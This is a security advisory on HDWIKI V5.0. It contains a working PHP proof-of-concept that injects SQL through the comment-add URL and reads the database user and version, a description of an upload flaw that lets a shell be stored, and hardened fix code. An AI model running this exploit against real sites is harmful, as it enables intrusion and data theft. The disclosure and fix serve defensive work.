

HDWIKI V5.0: multiple SQL injection vulnerabilities / executable file upload vulnerability and

HDWIKI V5.0 does essentially no filtering of input variables, so multiple SQL injection vulnerabilities exist.

Below is the injection code for the comment-posting location.

```php
<?php
error_reporting(7);
ini_set('max_execution_time', 0);

// Usage: php poc.php <host> <path>
$host = $argv[1];
$path = $argv[2];
$POSTDATA = 'comment=ddddddddddddd&c_class=0&re_id=0&anonymity=0&code=undefined';

echo $html = send($POSTDATA);

function send($cmd) {
    global $host, $path;
    // The subquery rides in the comment-add URL parameters, which the
    // application uses without filtering; the response echoes user() and version().
    $message  = "POST $path/index.php?comment-add-2,(select/**/concat(user(),0x5f,version())),1,1,1,1),(1 HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: " . $host . "\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: " . $host . "\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    $message .= "Connection: Close\r\n";
    $message .= "Cookie: kaiyuan_tip_date=2%2C11; hd_sid=OBIyML; hd_auth=768anzIskveAg6VFdx6L41XBHI%2Be0Xofs%2BfBr4E%2Fj7Wh%2BEkYJRzFdHzMp4uMwA6IqIVhfWwR6CD267coIdhV\r\n\r\n";
    $message .= $cmd;

    // Raw socket request so the un-encoded query string is sent as-is.
    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';
    while ($fp && !feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);

    return $resp;
}
```

Executable file upload vulnerability

The file upload code in attachement.php:

```php
function douploadimg() {
    $imgname = $_FILES['photofile']['name'];
    // Extension is taken from the client-supplied file name.
    $extname = file::extname($imgname);
    $destfile = $_ENV['attachment']->makepath($extname);
    $arrupload = file::uploadfile($_FILES['photofile'], $destfile);
    // ...
```

The functions involved:

```php
function extname($filename) {
    $pathinfo = pathinfo($filename);
    return strtolower($pathinfo['extension']);
}

function makepath($extname, $format = 'Ym') {
    // The client-controlled extension is appended unchanged to the stored file name.
    return 'uploads/' . gmdate($format, $this->base->time + $this->base->setting['time_offset'])
        . "/{$this->base->time}" . util::random(8) . '.' . strtolower($extname);
}

function uploadfile($attachment, $target, $maxsize = 1024, $is_image = 1) {
    $result = array('result' => false, 'msg' => 'upload mistake');
    if ($is_image) {
        $attach = $attachment;
        $filesize = $attach['size'] / 1024;
        if (0 == $filesize) {
            $result['msg'] = '上传错误';
            return $result;
        }
        if (substr($attach['type'], 0, 6) != 'image/') { // decides the file type solely from the client-supplied MIME type
            $result['msg'] = '格式错误';
            return $result;
        }
        if ($filesize > $maxsize) {
            $result['msg'] = '文件过大';
            return $result;
        }
    } else {
        $attach['tmp_name'] = $attachment;
    }
    $filedir = dirname($target);
    file::forcemkdir($filedir);
    if (@copy($attach['tmp_name'], $target) || @move_uploaded_file($attach['tmp_name'], $target)) {
        $result['result'] = true;
        $result['msg'] = '上传成功';
    }
    // ...
}
```

After the upload, the address of the shell can be seen in the picture wiki (图片百科). Source: http://bbs.wolvez.org/viewtopic.php?id=208

Suggested fix: add filtering at the code locations described above.
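The two weak spots above (the unfiltered comment-add parameters and the upload check that trusts only the client-supplied MIME type and file name) can be closed as shown in the following added example. This is illustrative code written for this page, not HDWIKI's own code: the function names hardened_uploadfile() and insert_comment(), the table and column names in the INSERT, and the assumption that the comment-add route carries a document id are all assumptions made for the example.

```php
<?php
// Added example, not HDWIKI code. Function, table and column names are assumed.
declare(strict_types=1);

/**
 * Server-side validation of an uploaded image. Unlike file::uploadfile(), this
 * never trusts $_FILES[...]['type'] or the client file name:
 *  - the file must have arrived through PHP's upload mechanism (is_uploaded_file)
 *  - the content type is sniffed from the bytes on disk and cross-checked with getimagesize()
 *  - the stored extension comes from a fixed allow-list keyed by the sniffed type
 *  - the stored name is random, so nothing from the client name reaches the filesystem
 */
function hardened_uploadfile(array $attach, string $uploadDir, int $maxKb = 1024): array
{
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];

    if (($attach['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return ['result' => false, 'msg' => 'upload error'];
    }
    if (!is_uploaded_file($attach['tmp_name'])) {
        return ['result' => false, 'msg' => 'not an uploaded file'];
    }
    if ($attach['size'] <= 0 || $attach['size'] / 1024 > $maxKb) {
        return ['result' => false, 'msg' => 'file empty or too large'];
    }

    // Sniff the real content type from the file bytes, not from the request header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($attach['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($attach['tmp_name']) === false) {
        return ['result' => false, 'msg' => 'not an allowed image'];
    }

    // Extension from the allow-list only; the client-supplied name is ignored entirely.
    $name   = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $target = rtrim($uploadDir, '/') . '/' . gmdate('Ym') . '/' . $name;

    if (!is_dir(dirname($target)) && !mkdir(dirname($target), 0755, true)) {
        return ['result' => false, 'msg' => 'cannot create upload directory'];
    }
    if (!move_uploaded_file($attach['tmp_name'], $target)) {
        return ['result' => false, 'msg' => 'upload failed'];
    }
    return ['result' => true, 'msg' => 'upload ok', 'path' => $target];
}

/**
 * Comment insert with every integer field validated and every value bound as a
 * prepared-statement parameter, so the comment-add parameters can no longer
 * become part of the SQL text. Table and column names are assumed.
 */
function insert_comment(PDO $db, array $in): int
{
    $docId = filter_var($in['doc_id'] ?? null, FILTER_VALIDATE_INT);
    $class = filter_var($in['c_class'] ?? 0, FILTER_VALIDATE_INT);
    $reId  = filter_var($in['re_id'] ?? 0, FILTER_VALIDATE_INT);
    $anon  = filter_var($in['anonymity'] ?? 0, FILTER_VALIDATE_INT);
    $body  = trim((string)($in['comment'] ?? ''));

    if ($docId === false || $class === false || $reId === false || $anon === false || $body === '') {
        throw new InvalidArgumentException('invalid comment parameters');
    }

    $stmt = $db->prepare(
        'INSERT INTO wiki_comment (did, c_class, re_id, anonymity, content, time)
         VALUES (:did, :c_class, :re_id, :anon, :content, :time)'
    );
    $stmt->execute([
        ':did'     => $docId,
        ':c_class' => $class,
        ':re_id'   => $reId,
        ':anon'    => $anon ? 1 : 0,
        ':content' => $body,
        ':time'    => time(),
    ]);
    return (int)$db->lastInsertId();
}
```

Both functions are meant to run inside the request handler: hardened_uploadfile() needs a real $_FILES entry because is_uploaded_file() and move_uploaded_file() only accept files PHP itself received, and insert_comment() expects a PDO connection with emulated prepares disabled so the placeholders are bound by the database driver rather than interpolated client-side.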

